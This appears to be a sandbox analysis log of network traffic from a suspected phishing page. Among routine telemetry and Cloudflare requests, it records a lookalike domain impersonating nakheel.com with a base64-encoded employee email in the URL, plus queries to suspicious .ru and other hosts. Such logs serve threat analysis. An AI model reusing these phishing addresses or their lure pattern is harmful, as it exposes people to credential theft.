Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20= HTTP/1.1Host: nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_70.2.dr, chromecache_74.2.drString found in binary or memory: </svg>`;function SW(a,s){return l=>{const h=TW(l).map(f=>kW(f));s.setValue({...s.value,shareOptions:h});function d(){s.setValue({...s.value,shareDialogOpened:!0})}function m(){s.setValue({...s.value,shareDialogOpened:!1})}const y=Hp(a);return y.addEventListener("share-button-clicked",d),y.addEventListener("share-dialog-closed",m),()=>{y.removeAllListeners()}}}function TW(a){return a.options.share?a.options.shareOptions.length===0?vM:a.options.shareOptions:[]}function kW(a){const s=new URL(window.location.href);s.searchParams.delete("jsapi");const l=s.toString();switch(a){case"facebook":return{id:"facebook",url:`https://www.facebook.com/share.php?u=${encodeURIComponent(l)}`,icon:bW};case"linkedin":return{id:"linkedin",url:`https://www.linkedin.com/shareArticle?mini=true&url=${encodeURIComponent(l)}&title=&summary=&source=`,icon:wW};case"twitter":return{id:"twitter",url:`https://x.com/share?url=${encodeURIComponent(l)}&text=`,icon:xW};case"mail":return{id:"mail",url:`mailto:?subject=Check out this great video&body=${encodeURIComponent(l)}`,icon:yW};default:return{id:"copy",url:l,icon:""}}}function EW(){return a=>{if(a.options.sources.length===0)return()=>{};a.addEventListener("loadsourcesrequest",s);async function s(){a.dispatchEvent(new en.util.FakeEvent("playerloadmediastart"));const l=lg(a.options.sources);try{await a.load(l[0].src,a.options.startTime,l[0].type)}catch{a.dispatchShakaError(en.util.Error.Severity.CRITICAL,en.util.Error.Category.MEDIA,en.util.Error.Code.MEDIA_SOURCE_OPERATION_FAILED);return}await a.loadCaptions(),a.dispatchEvent(new en.util.FakeEvent("playerloadmediaend")),a.dispatchEvent(new en.util.FakeEvent("loadsourcescomplete"))}return()=>{}}}function AW(){try{return crypto.randomUUID()}catch{return`10000000-1000-4000-8000-${1e11}`.replace(/[018]/g,a=>(a^crypto.getRandomValues(new Uint8Array(1))[0]&15>>a/4).toString(16))}}var CW=Object.defineProperty,IW=Object.getOwnPropertyDescriptor,cg=(a,s,l,h)=>{for(var d=h>1?void 0:h?IW(s,l):s,m=a.length-1,y;m>=0;m--)(y=a[m])&&(d=(h?y(s,l,d):y(d))||d);return h&&d&&CW(s,l,d),d};en.polyfill.installAll();const t3="options";function n3(a,s,l){const h=a instanceof Ha?a:Ha.getById(a);return l&&h.addEventListener("ready",l,{once:!0}),h.setAttribute("options",JSON.stringify(s)),h}Object.defineProperty(n3,"allowAutoplay",{get:ML,set:JX});let Ha=class extends Cn{constructor(){super(...arguments),this.umpId=`ump-${AW()}`,this.ariaLabel=null,this.playerStateContext=new Rw(this,{context:mr,initialValue:yM}),this.onVideoEvent=a=>{this.dispatchEvent(new Ct(a.type,a.target))}}render(){return pt` equals www.facebook.com (Facebook)
Source: chromecache_70.2.dr, chromecache_74.2.drString found in binary or memory: </svg>`;function SW(a,s){return l=>{const h=TW(l).map(f=>kW(f));s.setValue({...s.value,shareOptions:h});function d(){s.setValue({...s.value,shareDialogOpened:!0})}function m(){s.setValue({...s.value,shareDialogOpened:!1})}const y=Hp(a);return y.addEventListener("share-button-clicked",d),y.addEventListener("share-dialog-closed",m),()=>{y.removeAllListeners()}}}function TW(a){return a.options.share?a.options.shareOptions.length===0?vM:a.options.shareOptions:[]}function kW(a){const s=new URL(window.location.href);s.searchParams.delete("jsapi");const l=s.toString();switch(a){case"facebook":return{id:"facebook",url:`https://www.facebook.com/share.php?u=${encodeURIComponent(l)}`,icon:bW};case"linkedin":return{id:"linkedin",url:`https://www.linkedin.com/shareArticle?mini=true&url=${encodeURIComponent(l)}&title=&summary=&source=`,icon:wW};case"twitter":return{id:"twitter",url:`https://x.com/share?url=${encodeURIComponent(l)}&text=`,icon:xW};case"mail":return{id:"mail",url:`mailto:?subject=Check out this great video&body=${encodeURIComponent(l)}`,icon:yW};default:return{id:"copy",url:l,icon:""}}}function EW(){return a=>{if(a.options.sources.length===0)return()=>{};a.addEventListener("loadsourcesrequest",s);async function s(){a.dispatchEvent(new en.util.FakeEvent("playerloadmediastart"));const l=lg(a.options.sources);try{await a.load(l[0].src,a.options.startTime,l[0].type)}catch{a.dispatchShakaError(en.util.Error.Severity.CRITICAL,en.util.Error.Category.MEDIA,en.util.Error.Code.MEDIA_SOURCE_OPERATION_FAILED);return}await a.loadCaptions(),a.dispatchEvent(new en.util.FakeEvent("playerloadmediaend")),a.dispatchEvent(new en.util.FakeEvent("loadsourcescomplete"))}return()=>{}}}function AW(){try{return crypto.randomUUID()}catch{return`10000000-1000-4000-8000-${1e11}`.replace(/[018]/g,a=>(a^crypto.getRandomValues(new Uint8Array(1))[0]&15>>a/4).toString(16))}}var CW=Object.defineProperty,IW=Object.getOwnPropertyDescriptor,cg=(a,s,l,h)=>{for(var d=h>1?void 0:h?IW(s,l):s,m=a.length-1,y;m>=0;m--)(y=a[m])&&(d=(h?y(s,l,d):y(d))||d);return h&&d&&CW(s,l,d),d};en.polyfill.installAll();const t3="options";function n3(a,s,l){const h=a instanceof Ha?a:Ha.getById(a);return l&&h.addEventListener("ready",l,{once:!0}),h.setAttribute("options",JSON.stringify(s)),h}Object.defineProperty(n3,"allowAutoplay",{get:ML,set:JX});let Ha=class extends Cn{constructor(){super(...arguments),this.umpId=`ump-${AW()}`,this.ariaLabel=null,this.playerStateContext=new Rw(this,{context:mr,initialValue:yM}),this.onVideoEvent=a=>{this.dispatchEvent(new Ct(a.type,a.target))}}render(){return pt` equals www.linkedin.com (Linkedin)
Source: global trafficDNS traffic detected: DNS query: nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: qqc.ardsmandons.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru
Source: global trafficDNS traffic detected: DNS query: www.azure.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3075sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_nsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 15:42:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=70RJmGbFjusI5q%2F7w6atdrBuxIZdTyPkjkH7VRk2BN95bh4VlysmuFzVNyW1jn%2FW820i0GvDDWXgJOkCFRlEBCPvcyGQf3P8gAqgYvo9QEeTHm4VVXygauvSFapZQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=35775&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1522&delivery_rate=79375&cwnd=250&unsent_bytes=0&cid=a6705f414f1fc029&ts=205&x=0"CF-Cache-Status: HITAge: 9313Server: cloudflareCF-RAY: 8e82bff1fcff8ce8-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2351&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1903&delivery_rate=1323662&cwnd=234&unsent_bytes=0&cid=4ebacb65c203ebe9&ts=516&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 15:42:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: L9pTh6i7vZmvEQUqAAF/rTWQ3JMFNOT6Fns=$DZH9d713zg1ly+IZcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e82bffa1f0c42a6-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 15:42:46 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: WxH2Onf9w2fvynxFq+WQxZOQqlsgEs4woZA=$TkiKL64LfXydYDNIServer: cloudflareCF-RAY: 8e82c026ab93428b-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 15:42:57 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: n2EP5eSiC9c3JxxLueCqpddpreNmspzVQeE=$NeXfZvJcFxhVDkmOcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e82c0683a4c8c5f-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_83.2.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=12006
Source: chromecache_83.2.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=3334
Source: chromecache_83.2.drString found in binary or memory: https://bugzil.la/548397
Source: chromecache_83.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=277178
Source: chromecache_83.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=308064
Source: chromecache_83.2.drString found in binary or memory: https://dev.azure.com/mscomdev/Moray/_workitems/edit/4494
Source: chromecache_83.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key/Key_Values
Source: chromecache_83.2.drString found in binary or memory: https://elad.medium.com/css-position-sticky-how-it-really-works-54cd01dc2d46
Source: chromecache_83.2.drString found in binary or memory: https://github.com/mozilla/rhino/issues/346
Source: chromecache_70.2.dr, chromecache_74.2.drString found in binary or memory: https://github.com/nevware21/ts-async
Source: chromecache_83.2.drString found in binary or memory: https://github.com/tc39/proposal-error-cause
Source: chromecache_83.2.drString found in binary or memory: https://github.com/w3c/aria-practices/pull/1757
Source: chromecache_83.2.drString found in binary or memory: https://github.com/zloirock/core-js
Source: chromecache_83.2.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.25.0/LICENSE
Source: chromecache_83.2.drString found in binary or memory: https://github.com/zloirock/core-js/issues/86#issuecomment-115759028
Source: chromecache_83.2.drString found in binary or memory: https://javascript.info/size-and-scroll-window#width-height-of-the-document
Source: chromecache_83.2.drString found in binary or memory: https://keycode.info/table-of-all-keycodes
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aec
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-array.prototype.includes
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-array.prototype.indexof
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-getmethod
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-hasownproperty
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-iscallable
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-lengthofarraylike
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-math.trunc
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.defineproperty
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.getownpropertydescriptor
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.getownpropertynames
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerable
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.setprototypeof
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-ordinarytoprimitive
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-requireobjectcoercible
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-tointegerorinfinity
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-tolength
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-toobject
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-toprimitive
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-topropertykey
Source: chromecache_83.2.drString found in binary or memory: https://tc39.es/proposal-error-cause/#sec-errorobjects-install-error-cause
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
